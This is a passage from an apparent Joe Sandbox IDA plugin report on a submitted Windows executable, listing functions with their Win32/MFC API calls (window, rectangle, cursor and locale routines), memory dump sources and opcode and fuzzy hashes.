                                                              • ~_Task_impl.LIBCPMT ref: 0054EBD0
                                                                • Part of subcall function 0053F764: __EH_prolog3.LIBCMT ref: 0053F76B
                                                              • ~_Task_impl.LIBCPMT ref: 0054EBDF
                                                              • ~_Task_impl.LIBCPMT ref: 0054EBEE
                                                                • Part of subcall function 0054E64B: __EH_prolog3.LIBCMT ref: 0054E652
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: DestroyH_prolog3Icon$Task_impl
                                                              • String ID:
                                                              • API String ID: 115518600-0
                                                              • Opcode ID: 5b1701f6b2adfd129d7beead8ecd0e0cb491b6b3b9d60c0f6eec10c5e8b20c37
                                                              • Instruction ID: fa9c5750567c2d3d9722e0f687ea0a716c9f40cfb54b0f5d1b0d8eec8fb02191
                                                              • Opcode Fuzzy Hash: 5b1701f6b2adfd129d7beead8ecd0e0cb491b6b3b9d60c0f6eec10c5e8b20c37
                                                              • Instruction Fuzzy Hash: B6F01974801786CED719FBB4C21A7EDBFA4BF65304F50458CE5AA13282DB742B08DA62
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: EmptyRect
                                                              • String ID:
                                                              • API String ID: 2270935405-0
                                                              • Opcode ID: 7f76bfe561cc83431f30f4dde29e02bbf082c081d617b4578602985a261bf262
                                                              • Instruction ID: 81ca2d6e5e45e01afabe6474bff5df40297cd81f7d90005597f48e1d3d246dd8
                                                              • Opcode Fuzzy Hash: 7f76bfe561cc83431f30f4dde29e02bbf082c081d617b4578602985a261bf262
                                                              • Instruction Fuzzy Hash: 66E0C9B64007199AC730AB6AE844AD7B3ECAF84310B11091EE582C3514DA79F589CF94
                                                              APIs
                                                              • GetParent.USER32(?), ref: 005293A7
                                                                • Part of subcall function 005286AD: __EH_prolog3_GS.LIBCMT ref: 005286B4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_Parent
                                                              • String ID: 83`
                                                              • API String ID: 383333065-1826646354
                                                              • Opcode ID: 8e8d8b2e981467a6a9581a40a0c3c5a77ad2bf0d386e0a72d33beae32b0622f1
                                                              • Instruction ID: e1c671cf9dea4a4be52a38ea0bbdcd70dc567441757dcb553e1c5eed0ff68cce
                                                              • Opcode Fuzzy Hash: 8e8d8b2e981467a6a9581a40a0c3c5a77ad2bf0d386e0a72d33beae32b0622f1
                                                              • Instruction Fuzzy Hash: A581D134300611AFDB14EB66D899ABE7BE9BF99704F04082EF5468B3D1DF75AA40CB41
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: __floor_pentium4
                                                              • String ID: TR`
                                                              • API String ID: 4168288129-1372258800
                                                              • Opcode ID: ab2adc395457c2f0651f789bcdb8e98e96a59bbf3267f67ebd409e14be92367c
                                                              • Instruction ID: ca8bb30c100019b2f95e6fe1ea4076edd5ae5a75e68e4aa282006f54ba3e4a4e
                                                              • Opcode Fuzzy Hash: ab2adc395457c2f0651f789bcdb8e98e96a59bbf3267f67ebd409e14be92367c
                                                              • Instruction Fuzzy Hash: 8881A470E0060AEBCF09DFA4D1896EDBFB5FF44344F20C49EE496A62A1DB319A51CB54
                                                              APIs
                                                                • Part of subcall function 004ECDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,004E8A00,?,004E8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 004ECE0F
                                                              • GetWindowRect.USER32(?,?), ref: 00526534
                                                                • Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66
                                                                • Part of subcall function 005257F1: IsWindowVisible.USER32(?), ref: 0052580D
                                                                • Part of subcall function 005257F1: MapWindowPoints.USER32(?,?,?,00000002), ref: 00525846
                                                                • Part of subcall function 005257F1: GetWindowLongW.USER32(?,000000F0), ref: 00525890
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$LongPointsRectShowVisible
                                                              • String ID: 83`
                                                              • API String ID: 705879729-1826646354
                                                              • Opcode ID: 5fc94cf942df140d276dde2cb4ef49376ed7f2d6bae66d11e7bfa2e630a3e497
                                                              • Instruction ID: c5ad9698410ae5e9d528f074973dbaae9ffb53742ad392b4569939dfa28be642
                                                              • Opcode Fuzzy Hash: 5fc94cf942df140d276dde2cb4ef49376ed7f2d6bae66d11e7bfa2e630a3e497
                                                              • Instruction Fuzzy Hash: 35812771A0022AEFCF18DFA9D9C59AEBBB5FF08314F10452EE555A7281CB34AD40CB64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Parent
                                                              • String ID: To`
                                                              • API String ID: 975332729-992168270
                                                              • Opcode ID: 292012a5fd7e86b61810fe6e9202a5e4e599bfe4390c78cfb937c259bf7618ef
                                                              • Instruction ID: 545421e83e9bed45297437429322c9567a2a603addd7e68ab7c493a5851fc5f9
                                                              • Opcode Fuzzy Hash: 292012a5fd7e86b61810fe6e9202a5e4e599bfe4390c78cfb937c259bf7618ef
                                                              • Instruction Fuzzy Hash: 9561D5B1B04B05AFC721AF76E4296A677E5FF45344F11481FD68A823A5EB326810CF86
                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 005243D8
                                                                • Part of subcall function 004D8E6A: _malloc.LIBCMT ref: 004D8E88
                                                                • Part of subcall function 0055ADE5: __EH_prolog3_GS.LIBCMT ref: 0055ADEF
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3_$Exception@8H_prolog3Throw_malloc
                                                              • String ID: <L`$\w`
                                                              • API String ID: 3649189929-1950207190
                                                              • Opcode ID: 6b8cbbb3149b71c4713ed3c26cd60f153dabfbf30ceb028f7a91bd0e278c135b
                                                              • Instruction ID: 0f43aa3ec215b71d6c6d66213eb09c750b54adcd3e3e08a5426831254ae6c33c
                                                              • Opcode Fuzzy Hash: 6b8cbbb3149b71c4713ed3c26cd60f153dabfbf30ceb028f7a91bd0e278c135b
                                                              • Instruction Fuzzy Hash: 7751A430A002289BCF29EB659C96EEDBBA5FF86710F24029AF556971D1DB309D80CF50
                                                              APIs
                                                                • Part of subcall function 004EF457: GetModuleHandleW.KERNEL32(DWMAPI,?,?,00000000,?,?,?,?,?,?,?,?,00525927), ref: 004EF4CE
                                                                • Part of subcall function 004EF457: GetProcAddress.KERNEL32(00000000,DwmInvalidateIconicBitmaps), ref: 004EF4DE
                                                                • Part of subcall function 004EEAAD: __EH_prolog3.LIBCMT ref: 004EEAB4
                                                              • GetWindowRect.USER32(?,?), ref: 004EF890
                                                              • SetWindowRgn.USER32(?,00000000,00000001), ref: 004EF8DD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$AddressH_prolog3HandleModuleProcRect
                                                              • String ID:
                                                              • API String ID: 2106468464-3916222277
                                                              • Opcode ID: beaa174338364bc090a8f42533f46ac0f766638520b5c54bb98b77abf65d6033
                                                              • Instruction ID: 8bc58345040c9c21e186d7c35575297b82af6ffd1349f8586e15c72bec781318
                                                              • Opcode Fuzzy Hash: beaa174338364bc090a8f42533f46ac0f766638520b5c54bb98b77abf65d6033
                                                              • Instruction Fuzzy Hash: DE512A70A00648EFCB22DF66C844AEFBBF5FF88345F10453FE49A96251DB389944CA59
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H_$h_
                                                              • API String ID: 0-294143393
                                                              • Opcode ID: 7670805eb46c32fdf877c339dfb021e6920123c390aba523585a8e26bd413e1e
                                                              • Instruction ID: 15ac8ba212aae06da1da153c6c1a2180b5ee5b91b62c386a00137061ffe87997
                                                              • Opcode Fuzzy Hash: 7670805eb46c32fdf877c339dfb021e6920123c390aba523585a8e26bd413e1e
                                                              • Instruction Fuzzy Hash: 57418231300205ABEB258F15C88AFBE7BA6BF85710F384969F95ACB2D0DB75DC418B51
                                                              APIs
                                                              • BringWindowToTop.USER32(00000000), ref: 005109BC
                                                              • BringWindowToTop.USER32(00000000), ref: 005109C4
                                                                • Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09
                                                                • Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Window$Bring$LongShow
                                                              • String ID: X`
                                                              • API String ID: 1322630393-2458266361
                                                              • Opcode ID: c0c95ad07dfe0c18add5dfc30f8a281ba97007502a7f1aae339b65a94de09efb
                                                              • Instruction ID: d6ab475240858a796bd4bd5086b2ae51672343cad2601ee9b34bdeb33257b584
                                                              • Opcode Fuzzy Hash: c0c95ad07dfe0c18add5dfc30f8a281ba97007502a7f1aae339b65a94de09efb
                                                              • Instruction Fuzzy Hash: EC416D71B00205AFEB149BA5C855FBEBBB5FF48710F11006AF905EB2D1DB7598818B94
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 004F385C
                                                              • SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 004F38F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: InfoParametersRectSystemWindow
                                                              • String ID:
                                                              • API String ID: 85510744-3916222277
                                                              • Opcode ID: e5ed01bdb8f8ce0a1173a068ae6bbe62974f3236492180672ffebe3dd7063eed
                                                              • Instruction ID: 2dfaecd710e98ff99a377eca256a36b3e53f03b9c5b3b2e2e5e74b76873928a2
                                                              • Opcode Fuzzy Hash: e5ed01bdb8f8ce0a1173a068ae6bbe62974f3236492180672ffebe3dd7063eed
                                                              • Instruction Fuzzy Hash: 97411C71A00608DFCB25DF65C888AEFBBF5FF88351F10842EE95AA6250DB755A80CF54
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004D75B5
                                                              • _memmove.LIBCMT ref: 004D7606
                                                                • Part of subcall function 004D7450: std::_Xinvalid_argument.LIBCPMT ref: 004D746A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                              • String ID: string too long
                                                              • API String ID: 2168136238-2556327735
                                                              • Opcode ID: d186ba1c1ae6170e52bd3b0cd9c23a2f73132922dc3d666556cbe4465b0987f7
                                                              • Instruction ID: 6cd3691ae0c56ceda8ce6ca05ccd436ce4038324114a86038fbaf0ca31c57cc0
                                                              • Opcode Fuzzy Hash: d186ba1c1ae6170e52bd3b0cd9c23a2f73132922dc3d666556cbe4465b0987f7
                                                              • Instruction Fuzzy Hash: 913109323086106BD7249E5CB8A092BF7E9EF92724B20492FF445C7B41E765DC4083A9
                                                              APIs
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00550B15
                                                              • GetClientRect.USER32(?,?), ref: 00550B5E
                                                                • Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
                                                                • Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22
                                                                • Part of subcall function 004EAB9B: GetParent.USER32(?), ref: 004EABA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ClientCursorException@8H_prolog3LoadParentRectThrow
                                                              • String ID: \md
                                                              • API String ID: 1072971926-7061101
                                                              • Opcode ID: f42a4b79765483d7d17a1d598b9e49beb2cf2c406b7bd7ca214caf0b6aede0ae
                                                              • Instruction ID: 96bf9b64154b65006a8724bff47305eb01a1819628ffedcee37046246fed818c
                                                              • Opcode Fuzzy Hash: f42a4b79765483d7d17a1d598b9e49beb2cf2c406b7bd7ca214caf0b6aede0ae
                                                              • Instruction Fuzzy Hash: F1311EB1A002059FCB50EFA5C891BBEBBF9FF48315F10442FF516E7281DA74A9448B65
                                                              APIs
                                                              • _localeconv.LIBCMT ref: 004D6CFE
                                                                • Part of subcall function 005CE0ED: __getptd.LIBCMT ref: 005CE0ED
                                                                • Part of subcall function 005E8CA9: ____lc_handle_func.LIBCMT ref: 005E8CAC
                                                                • Part of subcall function 005E8CA9: ____lc_codepage_func.LIBCMT ref: 005E8CB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: ____lc_codepage_func____lc_handle_func__getptd_localeconv
                                                              • String ID: false$true
                                                              • API String ID: 679402580-2658103896
                                                              • Opcode ID: 3af01bbf6b343e437b21965cc733e9e63ed6285e3b06820147f70884b4ee4884
                                                              • Instruction ID: b2a0ae684e6368837d9c04532c6e3b83350011896fc8855225dfadea789c070d
                                                              • Opcode Fuzzy Hash: 3af01bbf6b343e437b21965cc733e9e63ed6285e3b06820147f70884b4ee4884
                                                              • Instruction Fuzzy Hash: 33317AB1A017C18FC710DF75A481766BFE5FB86300F2445BFD5AA8B302EA7599098B72
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 0050A262
                                                              • GetClientRect.USER32(?,?), ref: 0050A26F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                              • Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd
                                                              Similarity
                                                              • API ID: Rect$ClientWindow
                                                              • String ID: c
                                                              • API String ID: 23228050-2927717585
                                                              • Opcode ID: 9bf905923aee0a781edfee21d0807a37a6937fcd5a80fe24adfbeb4110b80575
                                                              • Instruction ID: 005de32a4165e8a00003148a955cfd11d41d516cbe0393ff8e948fa77b446a2e
                                                              • Opcode Fuzzy Hash: 9bf905923aee0a781edfee21d0807a37a6937fcd5a80fe24adfbeb4110b80575
                                                              • Instruction Fuzzy Hash: 8641E271A00609DFCB11DFA9C984AEEFBF9FF88300F14056AE156E3250DB716940DB65
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0050645F
                                                                • Part of subcall function 004E00D5: MoveToEx.GDI32(?,?,?,?), ref: 004E00FF
                                                                • Part of subcall function 004E00D5: MoveToEx.GDI32(?,?,?,?), ref: 004E0110
                                                                • Part of subcall function 004DFB68: MoveToEx.GDI32(?,?,?,00000000), ref: 004DFB85
                                                                • Part of subcall function 004DFB68: LineTo.GDI32(?,?,?), ref: 004DFB94
                                                                • Part of subcall function 004E06C9: SelectObject.GDI32(?,00000000), ref: 004E06EF
